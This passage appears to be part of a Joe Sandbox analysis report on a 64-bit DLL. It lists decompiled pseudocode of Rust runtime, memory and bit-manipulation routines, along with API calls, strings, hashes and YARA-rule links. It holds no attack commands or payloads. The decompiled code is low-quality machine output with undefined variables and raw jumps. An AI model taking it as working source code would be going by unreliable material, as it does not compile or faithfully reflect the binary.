				__rcx[6] = _t35 & 0x03ffffff;
				r15d = r15d + (_t38 >> 0x1a);
				 *__rcx = _t38 & 0x03ffffff;
				__rcx[7] = r11d;
				r15d = r15d >> 0x19;
				_t32 = r15d & 0x01ffffff;
				r14d = r14d + r15d;
				__rcx[1] = _t32;
				r9d = r9d & 0x01ffffff;
				__rcx[2] = r14d;
				__rcx[9] = r9d;
				__rcx[8] = r10d;
				return _t32;
			}

0x7fef30eb1d0
0x7fef30eb1d5
0x7fef30eb1da
0x7fef30eb1df
0x7fef30eb1ea
0x7fef30eb1f0
0x7fef30eb1f3
0x7fef30eb1fa
0x7fef30eb1fe
0x7fef30eb202
0x7fef30eb205
0x7fef30eb20c
0x7fef30eb210
0x7fef30eb217
0x7fef30eb221
0x7fef30eb22f
0x7fef30eb23d
0x7fef30eb24b
0x7fef30eb24e
0x7fef30eb257
0x7fef30eb25b
0x7fef30eb25f
0x7fef30eb262
0x7fef30eb269
0x7fef30eb26d
0x7fef30eb271
0x7fef30eb274
0x7fef30eb27b
0x7fef30eb27f
0x7fef30eb286
0x7fef30eb296
0x7fef30eb2a0
0x7fef30eb2aa
0x7fef30eb2ad
0x7fef30eb2c2
0x7fef30eb2c5
0x7fef30eb2cc
0x7fef30eb2d1
0x7fef30eb2d5
0x7fef30eb2da
0x7fef30eb2dd
0x7fef30eb2e2
0x7fef30eb2e9
0x7fef30eb2ee
0x7fef30eb2f3
0x7fef30eb2fe

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b1bc510c633b7b07ec87d2487a18c8d43a13357b02bea7647c93a57ebd74d5
Instruction ID: 7e613f9db8a97c8d755b46ab0cd21c532f93b658102d67b777508fc71440bb6e
Opcode Fuzzy Hash: a3b1bc510c633b7b07ec87d2487a18c8d43a13357b02bea7647c93a57ebd74d5
Instruction Fuzzy Hash: A221EFF39307688BC358CF09E9048097FA4F329BA47595309EF6523791D7B8EA91CB80

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C7DC0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ddca8d841cbcb2084083565ca18fe47249abb73598868dd062760d6d0eb03a
Instruction ID: e29ff61be71b08c3b65cf3849614e894eaa79f8991e61f4035422c6951348685
Opcode Fuzzy Hash: f7ddca8d841cbcb2084083565ca18fe47249abb73598868dd062760d6d0eb03a
Instruction Fuzzy Hash: 0321282AC2DFE751F713833E6407616D604AFF3285A90E71FBDE834C62E71587806218

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E6C50 Relevance: .1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E000007FE7FEF30E6C50(long long __rbx, signed long long* __rcx, long long _a8) {
				signed long long _t27;
				signed long long _t51;
				signed long long _t55;
				signed long long _t57;
				signed long long _t62;

				_a8 = __rbx;
				asm("movups xmm0, [edx]");
				asm("movups [ecx], xmm0");
				_t57 =  *__rcx;
				_t51 = (_t57 >> 0x00000004 ^ _t57) & 0x00f000f0;
				_t59 = _t57 ^ _t51 << 0x00000004 ^ _t51 ^ (((_t57 ^ _t51 << 0x00000004 ^ _t51) >> 0x00000008 ^ _t58) & 0x0000ff00) << 0x00000008 ^ ((_t57 ^ _t51 << 0x00000004 ^ _t51) >> 0x00000008 ^ _t58) & 0x0000ff00;
				_t62 = __rcx[1] ^ ((__rcx[1] >> 0x00000004 ^ _t60) & 0x00f000f0) << 0x00000004 ^ (__rcx[1] >> 0x00000004 ^ _t60) & 0x00f000f0 ^ (((__rcx[1] ^ ((__rcx[1] >> 0x00000004 ^ _t60) & 0x00f000f0) << 0x00000004 ^ (__rcx[1] >> 0x00000004 ^ _t60) & 0x00f000f0) >> 0x00000008 ^ _t61) & 0x0000ff00) << 0x00000008 ^ ((__rcx[1] ^ ((__rcx[1] >> 0x00000004 ^ _t60) & 0x00f000f0) << 0x00000004 ^ (__rcx[1] >> 0x00000004 ^ _t60) & 0x00f000f0) >> 0x00000008 ^ _t61) & 0x0000ff00;
				_t27 = (_t62 >> 0x00000010 ^ _t62) & _t51;
				_t55 = _t27 << 0x00000010 ^ _t27 ^ _t62;
				 *__rcx = _t55 << 0x00000020 | _t27;
				__rcx[1] = ((((_t57 ^ _t51 << 0x00000004 ^ _t51 ^ (((_t57 ^ _t51 << 0x00000004 ^ _t51) >> 0x00000008 ^ _t58) & 0x0000ff00) << 0x00000008 ^ ((_t57 ^ _t51 << 0x00000004 ^ _t51) >> 0x00000008 ^ _t58) & 0x0000ff00) >> 0x00000010 ^ _t59) & _t51) << 0x00000010 ^ ((_t57 ^ _t51 << 0x00000004 ^ _t51 ^ (((_t57 ^ _t51 << 0x00000004 ^ _t51) >> 0x00000008 ^ _t58) & 0x0000ff00) << 0x00000008 ^ ((_t57 ^ _t51 << 0x00000004 ^ _t51) >> 0x00000008 ^ _t58) & 0x0000ff00) >> 0x00000010 ^ _t59) & _t51 ^ _t59) >> 0x00000020 | _t55 & 0x00000000;
				return r9d;
			}

0x7fef30e6c50
0x7fef30e6c55
0x7fef30e6c6f
0x7fef30e6c72
0x7fef30e6c7f
0x7fef30e6cab
0x7fef30e6d02
0x7fef30e6d0f
0x7fef30e6d1f
0x7fef30e6d3d
0x7fef30e6d43
0x7fef30e6d47

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d75da731d83068e0ab151a2a0ea698baa3da3b4348ab975f97bb0858b3ca2a
Instruction ID: 31fbc7c27dafdd95a61ea52185fdbc7fe5665635a91f4996d97ca65175eda56f
Opcode Fuzzy Hash: d7d75da731d83068e0ab151a2a0ea698baa3da3b4348ab975f97bb0858b3ca2a
Instruction Fuzzy Hash: 41114F9172578507BE98D7B66D3A3A22661EB8DBC0B00F436DF5E5770BED3CA1408200

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF309C690 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 132libraryloaderCOMMON

Download Yara Rule

APIs

WaitForSingleObjectEx.KERNEL32(?,?,?,?,?,?,000007FEF309CF7F), ref: 000007FEF309C6BC
LoadLibraryA.KERNEL32 ref: 000007FEF309C6D4
CloseHandle.KERNEL32 ref: 000007FEF309C728
GetProcAddress.KERNEL32(?,?,?,?,?,?,000007FEF309CF7F), ref: 000007FEF309C74C
GetProcAddress.KERNEL32(?,?,?,?,?,?,000007FEF309CF7F), ref: 000007FEF309C783
GetProcAddress.KERNEL32(?,?,?,?,?,?,000007FEF309CF7F), ref: 000007FEF309C7BD
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,000007FEF309CF7F), ref: 000007FEF309C7D6

Strings

dbghelp.dll, xrefs: 000007FEF309C6CD
Local\RustBacktraceMutex, xrefs: 000007FEF309C6F9
SymSetOptions, xrefs: 000007FEF309C77C
SymInitializeW, xrefs: 000007FEF309C7B6
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF309C81B, 000007FEF309C839, 000007FEF309C857
SymGetOptions, xrefs: 000007FEF309C742

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: AddressProc$CloseCurrentHandleLibraryLoadObjectProcessSingleWait
String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$dbghelp.dll
API String ID: 3769800572-2238198615
Opcode ID: 181cbbbf7a54190fb183867ec2f281831724b3f27a0a61bf15334e447087d33f
Instruction ID: cd8c401482d640e558042fa3cf1edc8661cfc7c8ca23ff9996ce6c9f10b84859
Opcode Fuzzy Hash: 181cbbbf7a54190fb183867ec2f281831724b3f27a0a61bf15334e447087d33f
Instruction Fuzzy Hash: FE513E75E0AA469EFAD5DB21A8007BA33E3A785B94F584137884D073F9FA3CE445A310

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30428F4 Relevance: 11.3, APIs: 9, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000007FEF304291E
HeapFree.KERNEL32 ref: 000007FEF304293E
HeapFree.KERNEL32 ref: 000007FEF3042974
HeapFree.KERNEL32 ref: 000007FEF304298E
HeapFree.KERNEL32 ref: 000007FEF30429C1
HeapFree.KERNEL32 ref: 000007FEF30429EA
HeapFree.KERNEL32 ref: 000007FEF3042A04
HeapFree.KERNEL32 ref: 000007FEF3042A37
HeapFree.KERNEL32 ref: 000007FEF3042A4D

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 394c1cfbfcdb8b942c5d22b33148e70813a83be68dabd58f3cbaa4ebf70f5035
Instruction ID: 4f3cbae19ea52648b58b857340923a8058fd6e51e8761c11cfb0cba4356f35dc
Opcode Fuzzy Hash: 394c1cfbfcdb8b942c5d22b33148e70813a83be68dabd58f3cbaa4ebf70f5035
Instruction Fuzzy Hash: 6651FF76E04A8286F7A89B26E5443B963E2F788754F44C037CA8D476B4DF3CE995E340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A54E0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 258
memoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E000007FE7FEF30A54E0() {
				signed int _t98;
				signed int _t101;
				void* _t120;
				void* _t123;
				long long _t139;
				signed long long _t140;
				signed long long _t144;
				long long _t151;
				signed long long _t152;
				intOrPtr _t153;
				long long _t155;
				intOrPtr _t158;
				signed long long _t160;
				long long* _t163;
				long long _t165;
				signed long long _t172;
				intOrPtr _t173;
				intOrPtr _t175;
				long long _t179;
				long long _t208;
				long long _t209;
				long long _t210;
				long long _t217;
				long long* _t218;
				void* _t219;
				long long _t220;
				long long _t224;

				_t218 = _t219 + 0x80;
				 *((long long*)(_t218 + 0x50)) = 0xfffffffe;
				r15d =  *(_t218 + 0xb0) & 0x000000ff;
				asm("lock dec eax");
				if (_t144 >= 0) goto 0xf30a55e0;
				if ((_t144 & 0xffffffff) - 2 > 0) goto 0xf30a5611;
				 *(_t218 - 0x38) = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				 *((long long*)(_t218 - 0x30)) = 0xf3126278;
				 *((long long*)(_t218 - 0x28)) = _t220;
				 *((long long*)(_t218 - 0x20)) = _t224;
				 *((intOrPtr*)(_t218 - 0x18)) = r15b;
				 *((char*)(_t218 - 0x44)) = 0;
				 *(_t218 - 0x48) = 0;
				 *((long long*)(_t218 - 0x10)) = _t218 - 0x38;
				 *((long long*)(_t218 - 8)) = 0x7fef30556e0;
				 *_t218 = 0xf31262d0;
				 *((long long*)(_t218 + 8)) = 2;
				 *((long long*)(_t218 + 0x10)) = 0;
				_t151 = _t218 - 0x10;
				 *((long long*)(_t218 + 0x20)) = _t151;
				 *((long long*)(_t218 + 0x28)) = 1;
				_t98 = E000007FE7FEF3096D90(_t120, _t123, (_t144 & 0xffffffff) - 2, _t218 - 0x48);
				if (_t151 == 0) goto 0xf30a56bf;
				if ((_t98 & 0x00000003) != 1) goto 0xf30a56bf;
				 *((long long*)(_t218 + 0x40)) = _t151 - 1;
				 *((long long*)(_t218 + 0x38)) = _t151;
				_t152 =  *((intOrPtr*)(_t151 + 7));
				 *_t152();
				goto 0xf30a567d;
				_t153 =  *((intOrPtr*)( *[gs:0x58] + _t152 * 8));
				_t179 =  *((intOrPtr*)(_t153 + 0x60)) + 1;
				 *((long long*)(_t153 + 0x60)) = _t179;
				if (_t179 - 2 <= 0) goto 0xf30a56c8;
				 *((char*)(_t218 - 0x34)) = 0;
				 *(_t218 - 0x38) = 0;
				 *_t218 = 0xf3126268;
				 *((long long*)(_t218 + 8)) = 1;
				 *((long long*)(_t218 + 0x10)) = 0;
				_t155 = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				 *((long long*)(_t218 + 0x20)) = _t155;
				 *((long long*)(_t218 + 0x28)) = 0;
				_t208 = _t218;
				_t101 = E000007FE7FEF3096D90(_t120, _t123, _t179 - 2, _t218 - 0x38);
				if (_t155 == 0) goto 0xf30a56bf;
				if ((_t101 & 0x00000003) != 1) goto 0xf30a56bf;
				 *((long long*)(_t218 + 0x40)) = _t155 - 1;
				 *((long long*)(_t218 + 0x38)) = _t155;
				 *((intOrPtr*)( *((intOrPtr*)(_t155 + 7))))();
				_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x38)) + 7));
				if ( *((long long*)(_t158 + 8)) == 0) goto 0xf30a56ad;
				if ( *((long long*)(_t158 + 0x10)) - 0x11 < 0) goto 0xf30a569e;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				asm("int 0x29");
				asm("ud2");
				 *(_t218 - 0x38) = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				 *((long long*)(_t218 - 0x30)) = 0xf3126278;
				 *((long long*)(_t218 - 0x28)) =  *((intOrPtr*)(_t218 + 0x40));
				 *((long long*)(_t218 - 0x20)) = _t224;
				 *((intOrPtr*)(_t218 - 0x18)) = r15b;
				__imp__AcquireSRWLockShared();
				_t160 =  *((intOrPtr*)(_t208 + 0x20));
				if ( *0xf319cef8 != 0) goto 0xf30a5837;
				 *((char*)(_t218 + 0x4f)) = 1;
				 *_t160();
				 *(_t218 - 0x38) = _t160;
				 *((long long*)(_t218 - 0x30)) = _t208;
				sil = 1;
				if ( *((long long*)( *((intOrPtr*)( *[gs:0x58] + _t160 * 8)) + 0x60)) - 1 <= 0) goto 0xf30a588a;
				 *((intOrPtr*)(_t218 + 0x4e)) = sil;
				 *((long long*)(_t218 - 0x60)) =  *((intOrPtr*)(_t218 - 0x20));
				_t216 =  *(_t218 - 0x38);
				_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x30)) + 0x18));
				 *((char*)(_t218 + 0x4f)) = 1;
				 *_t163();
				if (_t163 != 0x66a4c8eb) goto 0xf30a5934;
				_t65 = _t216 + 8; // 0x8
				_t165 =  *_t65;
				 *(_t218 - 0x48) =  *( *(_t218 - 0x38));
				 *((long long*)(_t218 - 0x40)) = _t165;
				 *((char*)(_t218 + 0x4f)) = 1;
				E000007FE7FEF3099600(7, 0, _t165);
				_t217 = _t165;
				 *((long long*)(_t218 - 0x50)) = _t165;
				if (_t217 == 0) goto 0xf30a57c2;
				_t209 =  *((intOrPtr*)(_t217 + 0x10));
				if (_t209 == 0) goto 0xf30a57c2;
				 *((long long*)(_t218 - 0x10)) = _t209;
				 *((long long*)(_t218 - 8)) =  *((intOrPtr*)(_t217 + 0x18)) - 1;
				 *_t218 = _t218 - 0x10;
				 *((long long*)(_t218 + 8)) = _t218 - 0x48;
				 *((long long*)(_t218 + 0x10)) = _t218 - 0x60;
				 *((long long*)(_t218 + 0x18)) = _t218 + 0x4e;
				 *((long long*)(_t218 - 0x58)) = 0;
				 *((char*)(_t218 + 0x34)) = 0;
				 *(_t218 + 0x30) = 0;
				_t210 = _t218 + 0x30;
				E000007FE7FEF30A4E90(0, _t209, _t218, _t210,  *((intOrPtr*)(_t218 + 0x40)));
				_t139 = _t217;
				if (_t139 == 0) goto 0xf30a581d;
				asm("lock dec eax");
				if (_t139 != 0) goto 0xf30a581d;
				E000007FE7FEF3061D10();
				_t172 =  *((intOrPtr*)(_t218 - 0x58));
				_t140 = _t172;
				if (_t140 == 0) goto 0xf30a5864;
				asm("lock dec eax");
				if (_t140 != 0) goto 0xf30a5864;
				E000007FE7FEF30A0A30();
				goto 0xf30a5864;
				 *((char*)(_t218 + 0x4f)) = 1;
				 *_t172();
				 *(_t218 - 0x38) = _t172;
				 *((long long*)(_t218 - 0x30)) = _t210;
				_t173 =  *0xf319cf00; // 0x0
				 *((char*)(_t218 + 0x4f)) = 1;
				 *((long long*)( *((intOrPtr*)(_t173 + 0x28))))();
				__imp__ReleaseSRWLockShared();
				if (_t179 - 1 > 0) goto 0xf30a58dd;
				if (r15b == 0) goto 0xf30a58dd;
				 *((char*)(_t218 + 0x4f)) = 0;
				E000007FE7FEF30A38A0(0, r15b,  *((intOrPtr*)(_t173 + 0x28)), 0xf319cee8, _t218 - 0x38);
				goto 0xf30a5985;
				_t175 =  *0xf319ced0; // 0x0
				if (_t175 - 3 > 0) goto 0xf30a5969;
				goto __rax;
			}

0x7fef30a54ef
0x7fef30a54f7
0x7fef30a54ff
0x7fef30a550c
0x7fef30a5518
0x7fef30a552f
0x7fef30a553c
0x7fef30a5547
0x7fef30a554b
0x7fef30a554f
0x7fef30a5553
0x7fef30a5557
0x7fef30a555b
0x7fef30a5566
0x7fef30a5571
0x7fef30a557c
0x7fef30a5580
0x7fef30a5588
0x7fef30a5590
0x7fef30a5594
0x7fef30a5598
0x7fef30a55a7
0x7fef30a55af
0x7fef30a55bd
0x7fef30a55c9
0x7fef30a55d1
0x7fef30a55d5
0x7fef30a55d9
0x7fef30a55db
0x7fef30a55f2
0x7fef30a55fd
0x7fef30a5600
0x7fef30a560b
0x7fef30a5611
0x7fef30a5615
0x7fef30a5623
0x7fef30a5627
0x7fef30a562f
0x7fef30a5637
0x7fef30a563e
0x7fef30a5642
0x7fef30a564e
0x7fef30a5651
0x7fef30a5659
0x7fef30a5663
0x7fef30a566b
0x7fef30a5673
0x7fef30a567b
0x7fef30a5685
0x7fef30a568e
0x7fef30a5698
0x7fef30a56a7
0x7fef30a56b9
0x7fef30a56c4
0x7fef30a56c6
0x7fef30a56d2
0x7fef30a56dd
0x7fef30a56e1
0x7fef30a56e5
0x7fef30a56e9
0x7fef30a56f4
0x7fef30a5709
0x7fef30a570d
0x7fef30a5713
0x7fef30a571a
0x7fef30a571c
0x7fef30a5720
0x7fef30a5737
0x7fef30a5742
0x7fef30a5748
0x7fef30a5750
0x7fef30a5754
0x7fef30a575c
0x7fef30a5760
0x7fef30a5767
0x7fef30a5776
0x7fef30a577c
0x7fef30a5783
0x7fef30a5786
0x7fef30a578a
0x7fef30a578e
0x7fef30a5792
0x7fef30a5797
0x7fef30a579a
0x7fef30a57ad
0x7fef30a57af
0x7fef30a57b6
0x7fef30a57c2
0x7fef30a57c6
0x7fef30a57ce
0x7fef30a57d6
0x7fef30a57de
0x7fef30a57e6
0x7fef30a57ea
0x7fef30a57f2
0x7fef30a57f6
0x7fef30a5800
0x7fef30a5804
0x7fef30a5809
0x7fef30a580c
0x7fef30a580e
0x7fef30a5812
0x7fef30a5818
0x7fef30a581d
0x7fef30a5821
0x7fef30a5824
0x7fef30a5826
0x7fef30a582a
0x7fef30a5830
0x7fef30a5835
0x7fef30a5837
0x7fef30a583e
0x7fef30a5840
0x7fef30a5844
0x7fef30a584f
0x7fef30a585a
0x7fef30a5862
0x7fef30a586b
0x7fef30a5875
0x7fef30a587a
0x7fef30a587c
0x7fef30a5880
0x7fef30a5885
0x7fef30a588a
0x7fef30a5895
0x7fef30a58ab

APIs

HeapFree.KERNEL32 ref: 000007FEF30A56A7
HeapFree.KERNEL32 ref: 000007FEF30A56B9
AcquireSRWLockShared.KERNEL32 ref: 000007FEF30A56F4
ReleaseSRWLockShared.KERNEL32 ref: 000007FEF30A586B

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30A5535, 000007FEF30A5637, 000007FEF30A56CB
Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 000007FEF30A598C

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeapLockShared$AcquireRelease
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 428594635-3371182306
Opcode ID: 72e062520246c5bc8db3125e11f43d354f044f20dd198c7b072f2c60fba762fa
Instruction ID: b3ef929dda8c28ede2fd1b44ead392223c7299b34e7eb97bf59952912717892d
Opcode Fuzzy Hash: 72e062520246c5bc8db3125e11f43d354f044f20dd198c7b072f2c60fba762fa
Instruction Fuzzy Hash: 43D14732A0AB818DEB90CB61E8803AC37F2F749758F544126EA8E57BA8DF7DD154D340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30FFD10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E000007FE7FEF30FFD10() {
				void* _t13;
				long long _t17;
				long long* _t20;
				void* _t24;
				long long _t29;
				long long* _t30;
				void* _t31;
				long long _t34;
				void* _t38;
				long long* _t40;

				_t30 = _t31 - 0xc0 + 0x80;
				 *((long long*)(_t30 + 0x38)) = 0xfffffffe;
				_t29 = _t34 + 1;
				if (_t13 == 0) goto 0xf30fff92;
				if (_t13 < 0) goto 0xf30fffac;
				r14d = r9d;
				_t40 = _t20;
				E000007FE7FEF305A520();
				if (_t17 == 0) goto 0xf30fffb3;
				 *((long long*)(_t30 - 8)) = _t17;
				 *_t30 = _t29;
				 *((long long*)(_t30 + 8)) = 0;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t30 + 8)) = _t34;
				 *((char*)(_t30 + 0x36)) = 1;
				E000007FE7FEF3055200(0, _t17, _t24, _t34, _t38);
				if (_t17 == 0) goto 0xf30ffddf;
				 *((long long*)(_t40 + 8)) = 0xf3125dd0;
				 *_t40 = 1;
				if (_t29 == 0) goto 0xf30fff7f;
				return HeapFree(??, ??, ??);
			}

0x7fef30ffd21
0x7fef30ffd29
0x7fef30ffd34
0x7fef30ffd37
0x7fef30ffd3d
0x7fef30ffd43
0x7fef30ffd4c
0x7fef30ffd57
0x7fef30ffd5f
0x7fef30ffd68
0x7fef30ffd6c
0x7fef30ffd70
0x7fef30ffd81
0x7fef30ffd86
0x7fef30ffd8a
0x7fef30ffd96
0x7fef30ffd9e
0x7fef30ffda7
0x7fef30ffdab
0x7fef30ffdb5
0x7fef30ffdd8

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30FFF92

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: HeapProcess
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 54951025-1586615424
Opcode ID: b95b6d7d4f1b683a717b02c54c6d184eaba175af5f30a5f86e0b24bd2c6fa40d
Instruction ID: dfb72d6cef3fd45817ca4b09e25c27102c41cbb176d2ddae939572026a0f46e2
Opcode Fuzzy Hash: b95b6d7d4f1b683a717b02c54c6d184eaba175af5f30a5f86e0b24bd2c6fa40d
Instruction Fuzzy Hash: 2281A236A09B918CFB919F71A8043ED27E2FB49798F084136EE5D07BA9DB3C9185D340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3056835 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 144memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000007FEF3085653: HeapFree.KERNEL32 ref: 000007FEF308566E
Part of subcall function 000007FEF3085653: HeapFree.KERNEL32 ref: 000007FEF3085688

HeapFree.KERNEL32 ref: 000007FEF308FAF8
HeapFree.KERNEL32 ref: 000007FEF308FEFD
HeapFree.KERNEL32 ref: 000007FEF308FFC4
HeapFree.KERNEL32 ref: 000007FEF3090022
HeapFree.KERNEL32 ref: 000007FEF3090049
HeapFree.KERNEL32 ref: 000007FEF3090078

Strings

kx-hint, xrefs: 000007FEF308FE22

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: kx-hint
API String ID: 3298025750-3749674807
Opcode ID: d204d882f8296458e979d0aa91dbbfc2a5d232ce3e44797832c85481e1e384cc
Instruction ID: 8d496f17360ae8c9eb6d188df7fd1c8643b62685d4d23558a58ad7efba842d0c
Opcode Fuzzy Hash: d204d882f8296458e979d0aa91dbbfc2a5d232ce3e44797832c85481e1e384cc
Instruction Fuzzy Hash: 676142769086C289E7A59B15E4043FA63E2FBC5B84F4440379A8D47AAADF7CD584E700

Uniqueness

Uniqueness Score: -1.00%

